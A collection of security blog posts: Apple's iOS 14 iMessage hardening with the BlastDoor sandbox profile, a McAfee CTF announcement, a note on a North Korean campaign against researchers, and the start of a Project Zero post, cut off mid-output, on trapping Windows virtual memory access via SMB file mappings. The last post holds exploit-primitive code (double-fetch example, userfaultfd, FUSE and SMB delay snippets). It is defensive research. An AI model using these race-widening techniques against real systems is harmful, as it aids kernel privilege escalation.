
    ORR             X9, X8, X9

    ; Presumably, the refcnt isn’t used for all types of classes...

    TST             W20, #0x2000

    CSEL            X8, X9, X8, EQ

    ; Store the resulting value into the ISA field

    STR             X8, [X0]

However, the ISA PAC currently appears to never be checked; as such, it doesn’t yet affect any exploits. The most likely reason for this is that the ISA PAC feature is being rolled out in multiple phases, with the current implementation meant to allow in-depth performance evaluation, in particular of the reduced size of the inline refcount, which will likely cause more objects to use the more expensive out-of-line refcounting (used once the inline refcount saturates). With that, it can be expected that, in the absence of major performance issues, future releases of iOS and macOS will use PAC for the ObjC ISA field, thus likely breaking exploits that have to rely on faking ObjectiveC objects to achieve arbitrary code execution.

Conclusion

This blog post discussed three improvements in iOS 14 affecting iMessage security: the BlastDoor service, resliding of the shared cache, and exponential throttling. Overall, these changes are probably very close to the best that could’ve been done given the need for backwards compatibility, and they should have a significant impact on the security of iMessage and the platform as a whole. It’s great to see Apple putting aside the resources for these kinds of large refactorings to improve end users’ security. Furthermore, these changes also highlight the value of offensive security work: not just single bugs were fixed, but instead structural improvements were made based on insights gained from exploit development work.

As for the alleged NSO iMessage exploit, it may have been prevented from working against iOS 14 by any of the following:

  • The bug was fixed in iOS 14, for example due to the rewrite of large parts of the iMessage processing pipeline in Swift
  • The mere fact that processing happens in a different process, which could for example break a heap layouting primitive
  • The shared cache resliding would break their exploit if their exploit relied on some form of crash oracle to break ASLR
  • The stronger sandbox of the BlastDoor service, which could prevent the exploitation of a privilege escalation vulnerability after compromising the BlastDoor process

While these are some possible scenarios, and it could be the case that the exploit “just” needs some re-engineering to function again, the fact that these security improvements were shipped is certainly a positive outcome.

Attachment 1: blastdoor.sb

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.

;;;

;;; For all platforms: /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/XPCServices/MessagesBlastDoorService.xpc/MessagesBlastDoorService

(version 1)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Basic Rules

;;; -------------------------------------------------------------------------------------------- ;;;

;; Deny all default rules.

(deny default)

(deny file-map-executable process-info* nvram*)

(deny dynamic-code-generation)

;; Rules copied from system.sb. Ones that we've deemed overly permissive

;; or unnecessary for BlastDoor have been removed.

;; Allow read access to standard system paths.

(allow file-read*

       (require-all (file-mode #o0004)

                    (require-any (subpath "/System")

                                 (subpath "/usr/lib")

                                 (subpath "/usr/share")

                                 (subpath "/private/var/db/dyld"))))

(allow file-map-executable

       (subpath "/System/Library/CoreServices/RawCamera.bundle")

       (subpath "/usr/lib")

       (subpath "/System/Library/Frameworks"))

(allow file-test-existence (subpath "/System"))

(allow file-read-metadata

       (literal "/etc")

       (literal "/tmp")

       (literal "/var")

       (literal "/private/etc/localtime"))

;; Allow access to standard special files.

(allow file-read*

       (literal "/dev/random")

       (literal "/dev/urandom"))

(allow file-read* file-write-data

       (literal "/dev/null")

       (literal "/dev/zero"))

(allow file-read* file-write-data file-ioctl

       (literal "/dev/dtracehelper"))

;; TODO: Don't allow core dumps to be written out unless this is on a dev

;; fused device?

(allow file-write*

       (require-all (regex #"^/cores/")

                    (require-not (file-mode 0))))

;; Allow IPC to standard system agents.

(allow mach-lookup

       (global-name "com.apple.diagnosticd")

       (global-name "com.apple.logd")

       (global-name "com.apple.system.DirectoryService.libinfo_v1")

       (global-name "com.apple.system.logger")

       (global-name "com.apple.system.notification_center"))

;; Allow mostly harmless operations.

(allow signal process-info-dirtycontrol process-info-pidinfo

       (target self))

;; Temporarily allow sysctl-read with reporting to see if this is

;; used for anything.

(allow (with report) sysctl-read)

;; We don't need to post any darwin notifications.

(deny darwin-notification-post)

;; We shouldn't allow any other file operations not covered under

;; the default of deny above.

(deny file-clone file-link)

;; Don't deny file-test-existence: <rdar://problem/59611011>

;; (deny file-test-existence)

;; Don't allow access to any IOKit properties.

(deny iokit-get-properties)

(deny mach-cross-domain-lookup)

;; Don't allow BlastDoor to spawn any other XPC services other than

;; ones that we can intentionally whitelist later.

(deny mach-lookup (xpc-service-name-regex #".*"))

;; Don't allow any commands on sockets.

(deny socket-ioctl)

;; Denying this should have no ill effects for our use case.

(deny system-privilege)

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

(allow syscall-unix

       (syscall-number SYS_exit)

       (syscall-number SYS_kevent_qos)

       (syscall-number SYS_kevent_id)

       (syscall-number SYS_thread_selfid)

       (syscall-number SYS_bsdthread_ctl)

       (syscall-number SYS_kdebug_trace64)

       (syscall-number SYS_getattrlist)

       (syscall-number SYS_sigsuspend_nocancel)

       (syscall-number SYS_proc_info)

       

       (syscall-number SYS___disable_threadsignal)

       (syscall-number SYS___pthread_sigmask)

       (syscall-number SYS___mac_syscall)

       (syscall-number SYS___semwait_signal_nocancel)

       (syscall-number SYS_abort_with_payload)

       (syscall-number SYS_access)

       (syscall-number SYS_bsdthread_create)

       (syscall-number SYS_bsdthread_terminate)

       (syscall-number SYS_close)

       (syscall-number SYS_close_nocancel)

       (syscall-number SYS_connect)

       (syscall-number SYS_csops_audittoken)

       (syscall-number SYS_csrctl)

       (syscall-number SYS_fcntl)

       (syscall-number SYS_fsgetpath)

       (syscall-number SYS_fstat64)

       (syscall-number SYS_fstatfs64)

       (syscall-number SYS_getdirentries64)

       (syscall-number SYS_geteuid)

       (syscall-number SYS_getfsstat64)

       (syscall-number SYS_getgid)

       (syscall-number SYS_getrlimit)

       (syscall-number SYS_getuid)

       (syscall-number SYS_ioctl)

       (syscall-number SYS_issetugid)

       (syscall-number SYS_lstat64)

       (syscall-number SYS_madvise)

       (syscall-number SYS_mmap)

       (syscall-number SYS_munmap)

       (syscall-number SYS_mprotect)

       (syscall-number SYS_mremap_encrypted)

       (syscall-number SYS_open)

       (syscall-number SYS_open_nocancel)

       (syscall-number SYS_openat)

       (syscall-number SYS_pathconf)

       (syscall-number SYS_pread)

       (syscall-number SYS_read)

       (syscall-number SYS_readlink)

       (syscall-number SYS_shm_open)

       (syscall-number SYS_socket)

       (syscall-number SYS_stat64)

       (syscall-number SYS_statfs64)

       (syscall-number SYS_sysctl)

       (syscall-number SYS_sysctlbyname)

       (syscall-number SYS_workq_kernreturn)

       (syscall-number SYS_workq_open)

)

;; Still allow the system call but report in log.

(allow (with report) syscall-unix)

;; For validating the entitlements of clients. This is so only entitled

;; clients can pass data into a BlastDoor instance.

(allow process-info-codesignature)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Reading Files

;;; -------------------------------------------------------------------------------------------- ;;;

;; Support for BlastDoor receiving sandbox extensions from clients to either read files, or

;; write to a target location.

;; com.apple.app-sandbox.read

(allow file-read*

       (extension "com.apple.app-sandbox.read"))

;; com.apple.app-sandbox.read-write

(allow file-read* file-write*

       (extension "com.apple.app-sandbox.read-write"))

McAfee ATR Launches Education-Inspired Capture the Flag Contest!

27 January 2021 at 16:00

McAfee’s Advanced Threat Research team just completed its second annual capture the flag (CTF) contest for internal employees. Based on tremendous internal feedback, we’ve decided to open it up to the public, starting with a set of challenges we designed in 2019.

We’ve done our best to minimize guesswork and gimmicks and instead of flashy graphics and games, we’ve distilled the kind of problems we’ve encountered many times over the years during our research projects. Additionally, as this contest is educational in nature, we won’t be focused as much on the winners of the competition. The goal is for anyone and everyone to learn something new. However, we will provide a custom ATR challenge coin to the top 5 teams (one coin per team). All you need to do is score on 2 or more challenges to be eligible. When registering for the contest, make sure to use a valid email address so we can contact you.  

The ATR CTF will open on Friday, February 5th at 12:01pm PST and conclude on Thursday, February 18th, at 11:59pm PST.  

Click Here to Register! 

If you’ve never participated in a CTF before, the concept is simple. You will:

  • Choose the type of challenge you want to work on, 
  • Select a difficulty level by point value, 
  • Solve the challenge to find a ‘flag,’ and 
  • Enter the flag for the corresponding points.​​​​​

NOTE: The format of all flags is ATR[], placing the flag between the square brackets. For example: ATR[1a2b3c4d5e]. The flag must be submitted in full, including the ATR and square bracket parts.

The harder the challenge, the higher the points!  Points range from 100 to 500. All CTF challenges are designed to practice real-world security concepts, and this year’s categories include: 

  • Reverse engineering 
  • Exploitation 
  • Web 
  • Hacking Tools 
  • Crypto 
  • RF (Radio Frequency) 
  • Mobile 
  • Hardware
     

The contest is set up to allow teams as groups or individuals. If you get stuck, a basic hint is available for each challenge, but be warned – it will cost you points to access the hint and should only be used as a last resort.

Read before hacking: CTF rules and guidelines 

McAfee employees are not eligible for prizes in the public competition but are welcome to compete. 

When registering, please use a valid email address for any password resets and to be contacted for prizes. We will not store or save any email addresses or contact you for any non-contest related reasons.

Please wait until the contest ends to release any solutions publicly. 

Cooperation 

No cooperation between teams with independent accounts. Sharing of keys or providing/revealing hints to other teams is cheating; please help us keep this contest a challenge for all!

Attacking the Platform 

Please refrain from attacking the competition infrastructure. If you experience any difficulties with the infrastructure itself, questions can be directed to the ATR team using the email in the Contact Us section. ATR will not provide any additional hints, feedback, or clues. This email is only for issues that might arise, not for questions related to individual challenges.

Sabotage 

Absolutely no sabotaging of other competing teams, or in any way hindering their independent progress. 

Brute Forcing 

No brute forcing of challenge flags/keys against the scoring site is accepted or required to solve the challenges. You may, if necessary, perform brute force attacks on your own endpoint to determine a solution. If you’re not sure what constitutes a brute force attack, please feel free to contact us.

Denial of Service

DoSing the Capture the Flag (CTF) platform or any of the challenges is forbidden.

Additional rules are posted within the contest following login and should be reviewed by all contestants prior to beginning.

Many of these challenges are designed with Linux end-users in mind. However, if you are a Windows user, Windows 10 has a Linux subsystem called ‘WSL’ that can be useful, or a Virtual Machine can be configured with any flavor of Linux desired and should work for most purposes.

Happy hacking!

Looking for a little extra help? 

Find a list of useful tools and techniques for CTF competitions. While it’s not exhaustive or specifically tailored to this contest, it should be a useful starting point to learn and understand tools required for various challenges. 

Contact Us 

While it may be difficult for us to respond to emails, we will do our best – please use this email address to reach us with infrastructure problems, errors with challenges/flag submissions, etc. We are likely unable to respond to general questions on solving challenges. 

[email protected] 

How much do you know about McAfee’s industry-leading research team?

ATR is a team of security researchers that deliver cutting-edge vulnerability and malware research, red teaming, operational intelligence and more! To read more about the team and some of its highlighted research, please follow this link to the ATR website. 

General Release Statement 

By participating in the contest, you agree to be bound to the Official Rules and to release McAfee and its employees, and the hosting organization from any and all liability, claims or actions of any kind whatsoever for injuries, damages or losses to persons and property which may be sustained in connection with the contest. You acknowledge and agree that McAfee et al is not responsible for technical, hardware or software failures, or other errors or problems which may occur in connection with the contest. By participating you allow us to publish your name. The collection and use of personal information from participants will be governed by the McAfee Privacy Notice.


North Korea APT Might Have Used a Mobile 0day Too?

26 January 2021 at 17:37

Google TAG announced that a few profiles on Twitter were part of an APT campaign targeting security researchers. According to Google TAG, these threat actors are North Korean; they sought to establish credibility by publishing well-thought-out blog posts, interacting with researchers via Direct Messages, and luring them into downloading and running an infected Visual Studio project.

https://twitter.com/ihackbanme/status/1353870720191787010

Some of the fake profiles were: @z0x55g, @james0x40, @br0vvnn, @BrownSec3Labs

Using a Chrome 0day to infect clients?

In their post, Google TAG mentioned that the attackers were able to pop a fully patched Windows box running Chrome.

From Google’s post:

In addition to targeting users via social engineering, we have also observed several cases where researchers have been compromised after visiting the actors’ blog. In each of these cases, the researchers have followed a link on Twitter to a write-up hosted on blog.br0vvnn[.]io, and shortly thereafter, a malicious service was installed on the researcher’s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.

Attacking Mobile Users?

According to ZecOps Mobile Threat Intelligence, the same threat actor might have used an Android 0day too.

If you entered this blog from your Android or iOS devices – we would like to examine your device using ZecOps Mobile DFIR tool to gather additional evidence.
Please contact us as soon as convenient at [email protected]

 


Windows Exploitation Tricks: Trapping Virtual Memory Access

21 January 2021 at 19:33

Posted by James Forshaw, Project Zero

This blog is a continuation of my series of Windows exploitation tricks. This one describes an exploitation trick I’ve been trying to develop for years, succeeding (mostly, more on that later) on the latest versions of Windows 10. It’s a trick to trap access to virtual memory, get feedback when it occurs and delay access indefinitely. The blog will go into some of the background for why this technique is useful, an overview of the research I did to find the trick as well as an overview of the types of vulnerabilities it can be used with.

Background

When would you need such an exploitation trick? A good example of the types of security vulnerabilities which can benefit from it can be found in the seminal Bochspwn research by Mateusz Jurczyk and Gynvael Coldwind. The research showed a way of automating the discovery of memory double-fetches in the Windows kernel.

If you’ve not read the paper, a double-fetch is a type of Time-of-Check Time-of-Use (TOCTOU) vulnerability where code reads a value from memory, such as a buffer length, verifies that value is within bounds and then rereads the value from memory before use. By swapping the value in memory between the first and second fetches the verification is bypassed which can lead to security issues such as privilege escalation or information disclosure. The following is a simple example of a double fetch taken from the original paper.

DWORD* lpInputPtr = // controlled user-mode address

UCHAR  LocalBuffer[256];

 

if (*lpInputPtr > sizeof(LocalBuffer)) { ①

  return STATUS_INVALID_PARAMETER;

}

RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);②

This code copies a buffer from a controlled user mode address into a fixed sized stack buffer. The buffer starts with a DWORD size value which indicates the total size of the buffer. Memory corruption can occur if the size value pointed to by lpInputPtr changes between the first read of the size value to compare against the buffer size ① and the second read of the size when copying into the buffer ②. For example, if the first time the value is read it’s 100 and the second it’s 400 then the code will pass the size check, as 100 is less than 256, but will then copy 400 bytes into that buffer, corrupting the stack.

Once a vulnerability such as this example was discovered, Mateusz and Gynvael needed to exploit it. How they achieved exploitation is detailed in section 4 of the paper. The exploit techniques that were identified were all probabilistic. Exploitation typically required two threads racing each other, with one reading and one writing. The probabilistic nature of success is due to the probability that in between the first read from a memory location and the second read the writing thread sets a new value which exploits the vulnerability.
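To sketch the shape of such a race in user mode (a toy stand-in: victim() models the vulnerable code’s two fetches but just reports when they disagree, rather than corrupting memory):

#include <pthread.h>
#include <stdint.h>
#include <stdio.h>

static volatile uint32_t size_field;    // the shared "size" value both threads touch

// Stand-in for the vulnerable code: fetch the value twice, as the bounds
// check and the copy length would, and report if it changed in between.
static int victim(void) {
    uint32_t checked = size_field;      // first fetch (bounds check)
    uint32_t used    = size_field;      // second fetch (copy length)
    return checked != used;
}

// Racing writer: endlessly flip the value between one that passes the check
// and one that would overflow the buffer.
static void *flipper(void *arg) {
    (void)arg;
    for (;;) { size_field = 100; size_field = 400; }
    return NULL;
}

int main(void) {
    pthread_t t;
    pthread_create(&t, NULL, flipper, NULL);
    for (uint64_t tries = 1; ; tries++) {
        if (victim()) {
            printf("fetches disagreed after %llu attempts\n",
                   (unsigned long long)tries);
            return 0;
        }
    }
}

On a single CPU core the flip almost never lands between two adjacent fetches, which is exactly the limitation described next.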

To widen the TOCTOU window many of the techniques described abuse the behavior of virtual memory on Windows. A process on Windows can typically access a large virtual memory region, up to 8TiB in size. This size is likely to be significantly larger than the physical memory in the system, especially considering the limit is per-process, not per-system. Therefore to maintain the illusion of such a large memory address space the kernel uses on-demand memory paging.

When memory is allocated in the process the CPU’s page tables are set up to indicate the presence of the memory region but are marked as invalid. At this point the virtual memory region has been allocated but there is no physical memory backing it. When the process tries to access that memory region the CPU will generate an exception, generally referred to as a page-fault, which is handled by the kernel.

The kernel can look up the memory address which was accessed to cause the page-fault and try and fix the address. How the page-fault is fixed depends on the type of memory access. A simple example is if the memory was allocated but not yet used the kernel will get a physical memory page, initialize it to zeros then adjust the page tables to map that new physical memory page at the faulting address. Once the page-fault has been fixed the faulting thread can be restarted at the instruction which accessed the memory and the memory access should now succeed as if it was always present.

A more complex scenario is if the page is part of a memory mapped file. In this case the kernel will need to request that the page’s data is read back from disk before it can satisfy the page-fault. This can take quite a long time, at least for spinning rust disks, so it might require the faulting thread to be suspended while it waits for the page to be read. Once the page has been read the memory can be fixed up, the original thread can be resumed and the thread restarted at the faulting instruction.

Overview diagram of page fault causing access to the file system. A user application is shown reading memory from a file mapped into memory. When the memory read occurs a page fault is generated in the kernel. As the memory is part of a file mapping this calls into the IO Manager which then requests the file data from the file system. The read data is then returned back through the kernel to satisfy the page fault and the user application can complete the memory read.

The end result is that it can take a significant amount of time (relative to a CPU’s native speed, that is) to handle a page-fault. However, abusing these virtual memory behaviors only widens the TOCTOU window; it doesn’t allow for precise timing to swap values in memory. As a result the exploitation techniques still came with limitations. For example, it was very slow, if not impossible in some cases, to exploit on a machine with a single CPU core as it relies on having concurrent threads reading and writing.

An ideal exploit primitive would be one where the exploitation window can be made arbitrarily large so that it becomes trivial to win the race. Taking previous experience and knowledge of existing bug classes my ideal primitive would be one which meets a set of criteria:

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

While meeting all these criteria would be ideal, there’s no guarantee we’ll meet all or any of them. If we only meet some then the range of exploitation vulnerabilities might be limited. Let’s start with a quick overview of the existing work which might give us an idea of how to proceed to find a primitive.

Existing Work

Having spoken to Mateusz and made an effort to look for any subsequent work there seems to be little novel work over and above the original Bochspwn paper on the exploitation of these types of TOCTOU issues. At least this is true for exploitation on Windows, however, novel techniques have been developed on other platforms, specifically Linux. Both of these techniques rely on the behavior of virtual memory I previously described.

The first technique in Linux makes use of Userfault File Descriptor (userfaultfd) to get notifications when page-faults occur in a process. With userfaultfd enabled a secondary thread in the process can read a notification and handle the page-fault in user mode. Handling the fault could be mapping memory at the appropriate location or changing page protection. The key is the faulting thread is suspended until the page-fault is handled by another thread. Therefore if a kernel function accessed the memory the request will be trapped until it's completed. This allows for a primitive where the memory access can be delayed indefinitely as well as having a timing signal for the access. Using userfaultfd also allows the fault to be distinguished between read and write faults as the memory page can be write-protected.
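A condensed sketch of that approach (Linux-only, error handling elided; only missing-page faults are trapped here, the write-protect variant additionally uses UFFDIO_WRITEPROTECT):

#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>

// Fault handler thread: block until a page-fault is reported, log it, delay
// as long as desired, then resolve the fault with attacker-chosen bytes.
static void *fault_handler(void *arg) {
    int uffd = *(int *)arg;
    struct uffd_msg msg;
    while (read(uffd, &msg, sizeof(msg)) == sizeof(msg)) {
        if (msg.event != UFFD_EVENT_PAGEFAULT)
            continue;
        printf("fault at %llx\n", (unsigned long long)msg.arg.pagefault.address);
        sleep(10);                                // delay the faulting thread
        static char page[4096];
        memset(page, 'A', sizeof(page));          // arbitrary content
        struct uffdio_copy copy = {
            .dst = msg.arg.pagefault.address & ~0xfffULL,
            .src = (unsigned long)page,
            .len = sizeof(page),
            .mode = 0,
        };
        ioctl(uffd, UFFDIO_COPY, &copy);          // satisfy the fault
    }
    return NULL;
}

int main(void) {
    int uffd = (int)syscall(SYS_userfaultfd, O_CLOEXEC);
    struct uffdio_api api = { .api = UFFD_API };
    ioctl(uffd, UFFDIO_API, &api);

    char *mem = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    struct uffdio_register reg = {
        .range = { .start = (unsigned long)mem, .len = 4096 },
        .mode = UFFDIO_REGISTER_MODE_MISSING,     // trap not-yet-mapped pages
    };
    ioctl(uffd, UFFDIO_REGISTER, &reg);

    pthread_t t;
    pthread_create(&t, NULL, fault_handler, &uffd);
    printf("read: %c\n", mem[0]);                 // blocks ~10s, then prints 'A'
    return 0;
}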

Using userfaultfd works for in-process access such as from the kernel, but is not really useful if the code accessing the memory is in another process. To solve that problem you can use the FUSE file system as Jann Horn demonstrated in a previous Project Zero blog post. A FUSE file system is implemented entirely in user mode, but any requests for the file go through the Linux kernel’s Virtual File System APIs. As a file is accessed as if it was implemented by an in-kernel file system it’s possible to map that file into memory using mmap. When a page-fault occurs on a FUSE backed memory region a request will be made to the user-mode file system daemon which can delay the read or write request indefinitely.
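The skeleton of such a FUSE daemon is small; the sketch below uses the libfuse 3 high-level API (the file name and size are arbitrary choices):

// Minimal FUSE 3 daemon exposing a single file, /trap, whose reads can be
// delayed at will. Build: gcc trap.c `pkg-config fuse3 --cflags --libs`
#define FUSE_USE_VERSION 31
#include <fuse.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

static int trap_getattr(const char *path, struct stat *st,
                        struct fuse_file_info *fi) {
    (void)fi;
    memset(st, 0, sizeof(*st));
    if (!strcmp(path, "/")) {
        st->st_mode = S_IFDIR | 0755; st->st_nlink = 2;
    } else if (!strcmp(path, "/trap")) {
        st->st_mode = S_IFREG | 0444; st->st_size = 1 << 30;  // 1GiB dummy file
    } else {
        return -ENOENT;
    }
    return 0;
}

// Page-faults on a mapping of /trap arrive here as read requests: we see the
// exact offset, can stall for as long as we like and return arbitrary bytes.
static int trap_read(const char *path, char *buf, size_t size, off_t off,
                     struct fuse_file_info *fi) {
    (void)path; (void)fi;
    fprintf(stderr, "read: %zu bytes at offset %lld\n", size, (long long)off);
    sleep(10);                 // delay the faulting thread
    memset(buf, 'A', size);    // arbitrary data
    return (int)size;
}

static const struct fuse_operations trap_ops = {
    .getattr = trap_getattr,
    .read    = trap_read,
};

int main(int argc, char *argv[]) {
    return fuse_main(argc, argv, &trap_ops, NULL);
}

Mapping /trap into another process and touching a page then blocks that process in trap_read for the duration of the sleep.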

Remote File Systems

As far as I can tell there’s nothing equivalent to Linux’s userfaultfd on Windows. One feature which caught my eye was memory write watches. But those seem to just allow an application to query if memory had been written to since the last time it was checked and don’t allow memory writes to be trapped.

If we can’t just trap page-faults to virtual memory what about mapping a file on a user-mode filesystem like FUSE? Unfortunately there is no built-in FUSE driver in Windows 10 (yet?), but that doesn’t mean there’s no mechanism to implement a file system in user-mode. There are some efforts to make a real FUSE on Windows, such as the WinFsp project, but I’d expect the chances of them being installed on a real system to be vanishingly small.

The first thought I had was to try to exploit Multiple UNC Provider (MUP) clients. When you access a file via a UNC path, e.g. \\server\share\file.bin, this will be handled by a MUP driver in the kernel, which will pass it to one of the registered client drivers. As far as the kernel is concerned the opened file is a regular file (with some caveats) which generally means the file can be mapped into memory. However, any requests for the contents of that file will not be handled directly, but instead handled by a server over a network protocol.

Ideally we should be able to implement our own server, handle the read or write requests to a file mapping which will allow us to detect or delay the request so that we can exploit any TOCTOU. The following table contains only Microsoft MUP drivers that I identified. The table contains what versions of Windows 10 the driver is supported on and whether it’s something enabled by default.

Remote File System     | Supported Version | Default?
---------------------- | ----------------- | -----------------------------
SMB                    | Everything        | Yes (SMBv1 might be disabled)
WebDAV                 | Everything        | Yes (except Server SKUs)
NFS                    | Everything        | No
P9                     | Windows 10 1903   | No (needs WSL)
Remote Desktop Client  | Everything        | Yes

While MUP was designed for remote file systems, there’s no requirement that the file system server is actually remote. SMB, WebDAV and NFS are IP based protocols and can be redirected to localhost. P9 uses a local Unix Socket which can’t be remoted anyway. The terminal services client sends file access requests back to the client system over the RDP protocol. For all these protocols we can implement the server with varying degrees of effort and see if we can detect and delay reads and writes to the file mapping.

I decided to focus only on two, SMB and WebDAV. These were the only two which are enabled by default and are trivially usable. While the Remote Desktop Client is in theory installed by default, the RDP server is not normally enabled. Also, setting up the RDP session is complex and might require valid authentication credentials, therefore I decided against it.

Server Message Block

SMB is almost as old as Windows itself, having been introduced in Lan Manager 1.0 back in 1987. The latest SMB version 3.1 protocol only bears a passing resemblance to that original version having shed its NetBIOS roots for a TCP/IP connection. Its lineage does mean it’s the best integrated of any of the network file systems, with the MUP APIs being designed around the needs of SMB.

I decided to do a simple test of the behavior of mapping a file over SMB. This is fairly easy as you can access SMB on the same machine via localhost. I first created a 1GiB file on a local disk, the rationale being if SMB supports caching file data it’s unlikely to read something that large in one go. I then started Wireshark and monitored the loopback interface to capture the SMB traffic as shown below.

Overview diagram of SMB test with wireshark in place to inspect the network traffic from the SMB client to the SMB server. The diagram starts with a user application reading memory of a mapped file which causes a page fault. As the file is on an SMB share this calls into the SMB client which sends a request to the SMB server and from there to the file system. In between the SMB client and SMB server components the Wireshark logo indicates where we are monitoring the network traffic.

I then wrote a quick PowerShell script which will map the file into memory and then reads a few bytes from memory at a few different offsets.

Use-NtObject($f = Get-NtFile "\\localhost\c$\root\file.bin" -Win32Path) {

    Use-NtObject($s = New-NtSection -File $f -Protection ReadWrite) {

        Use-NtObject($m = Add-NtSection -Section $s -Protection ReadWrite) {

            $m.ReadBytes(0, 4)

            $m.ReadBytes(256*1024*1024, 4)

            $m.ReadBytes(512*1024*1024, 4)

            $m.ReadBytes(768*1024*1024, 4)

        }

    }

}

This just reads 4 bytes from offsets 0, 256MiB, 512MiB and 768MiB. Going back to Wireshark I filtered the output to only SMBv2 read requests using the display filter smb2.cmd == 8, and the following four packets can be observed.

Read Request Len:32768 Off:0 File: root\file.bin

Read Request Len:32768 Off:268435456 File: root\file.bin

Read Request Len:32768 Off:536870912 File: root\file.bin

Read Request Len:32768 Off:805306368 File: root\file.bin 

This corresponds with the exact memory offsets we accessed in the script although the length is always 32KiB, not the 4 bytes we requested. Note that it’s not the typical Windows memory allocation granularity of 64KiB which you might expect. In my testing I’ve never seen anything other than 32KiB requested.

All the bytes we’ve tested are aligned to the 32KiB block, what if the bytes were not aligned, for example if we accessed 4 bytes from address 512MiB minus 2? Changing the script to add the following allows us to check the behavior:

$m.ReadBytes(512*1024*1024 - 2, 4)

In Wireshark we see the following read requests.

Read Request Len:32768 Off:536838144 File: root\file.bin

Read Request Len:32768 Off:536870912 File: root\file.bin

The accesses are still at 32KiB boundaries, however as the request straddles two blocks the kernel has fetched the preceding 32KiB of data from the file and then the following 32KiB. You might think that all makes sense, however this behavior turned out to be a fluke of testing.

Overview diagram of memory read layout. In the middle is a set of boxes representing the native 4KiB pages being read. All the boxes are contained within a single larger region which is the large page size. Above the boxes are arrows which show that from the base of the 4KiB box a 32KiB read will be made into the file which can satisfy the reads from other 4KiB pages. The final box shows that the last 32KiB of the large page size will always be read as a single page regardless of where in the box the read occurs.

The diagram above shows the structure of how mapped file reads are handled. When an address is read the kernel will request 32KiB from the closest 4KiB page boundary, not the 32KiB boundary. However, there’s then a secondary structure on top based on the supported size of large pages. If the read is anywhere within 32KiB of the end of a large page the read offset is always for the last 32KiB.

For example, on my system the large page size (as queried using the GetLargePageMinimum API) is 2MiB. Therefore if you start at offset 512MiB, between 512MiB and 514MiB - 32KiB the kernel will read 32KiB from the offset truncated to the closest 4KiB boundary. Between 514MiB - 32KiB and 514MiB the read will always request offset 514MiB - 32KiB so that the 32KiB read doesn’t cross the large page boundary.
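Expressed as code, the observed rule looks like this (a sketch based on the measurements above, with the 2MiB large page size from my system):

#include <stdint.h>

#define PAGE_SIZE   0x1000ULL    // native 4KiB page
#define LARGE_PAGE  0x200000ULL  // 2MiB, from GetLargePageMinimum on my system
#define READ_SIZE   0x8000ULL    // the observed 32KiB SMB read

// Which file offset will the SMB client request when `access` is touched?
uint64_t smb_read_offset(uint64_t access) {
    uint64_t off = access & ~(PAGE_SIZE - 1);              // round down to 4KiB
    uint64_t large_end = (access | (LARGE_PAGE - 1)) + 1;  // end of large page
    if (off > large_end - READ_SIZE)
        off = large_end - READ_SIZE;  // clamp: never cross the large page end
    return off;
}

For the earlier example, smb_read_offset(512MiB - 2) yields 512MiB - 32KiB, matching the first read request in the capture.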

This allows reads at 4KiB boundaries, however the amount of data read is still 32KiB. This means that once one 4KiB page is accessed the kernel will populate the current page and 7 following pages. Is there any way to only populate a single native page? Based on a comment from Mateusz I tested returning short reads. If the SMB server returns fewer bytes than requested from the read then rather than failing it only populates the pages covered by the read. By returning these short reads we can get trap granularity down to the native page size except for the final 32KiB of a large page. If a read request is shorter than the native page size the rest of the page is zeroed.

What about writing? Let’s change the script again to call WriteBytes rather than ReadBytes, for example:

$m.WriteBytes(256*1024*1024, @(0xAA, 0xBB, 0xCC, 0xDD))

You will see a write request to the file in Wireshark, similar to the following:

Write Request Len:4096 Off:268435456 File: root\file.bin

However, if you dig a bit deeper you’ll notice that the write only happens once the file is closed, not in response to the WriteBytes call. This makes sense: there isn’t any easy way to detect when the write happened in order to force the page to be flushed back to the file system. Even if there were a way, flushing to a network server for every write would have a massive performance impact.

All is not lost however, before the memory is safe to write it must be populated with the contents from the file. Therefore if you look before the write you’ll see a corresponding read request for the 32KiB region which encompasses the write location, and that read is synchronous with the memory access. You can detect a write through its corresponding read, but you can’t distinguish a read from a write at the protocol level.

All this testing indicates if we have control over the server we can detect memory access to the mapped file. Can we delay the access as well? I wrote a simple SMB server in .NET 5 using the SMBLibrary by Tal Aloni. I implemented the server with a custom filesystem handler and added some code to the read path which delays for 10 seconds when the file offset is at or above 512MiB.

if (Position >= (512 * 1024 * 1024)) {

    Console.WriteLine("====> Delaying at Position {0:X}", Position);

    Thread.Sleep(10000);

    Console.WriteLine("====> Continuing.");

}

The data returned by the read operation can be arbitrary, you just need to fill in the appropriate byte buffers in the read. To test the access times I wrapped the memory read requests inside a Measure-Command call to time the memory access.

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

To compare the access time a read request is made to a location 4 bytes below the 512MiB boundary and then at the 512MiB boundary. By making two requests we should be able to see if the results differ per-read. The results were as follows:

# Below 512MiB (Request 1)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 1

Milliseconds      : 25

...

# Below 512MiB (Request 2)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 0

Milliseconds      : 1

...

# Above 512MiB (Request 1)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 10

Milliseconds      : 358

...

# Above 512MiB (Request 2)

Days              : 0
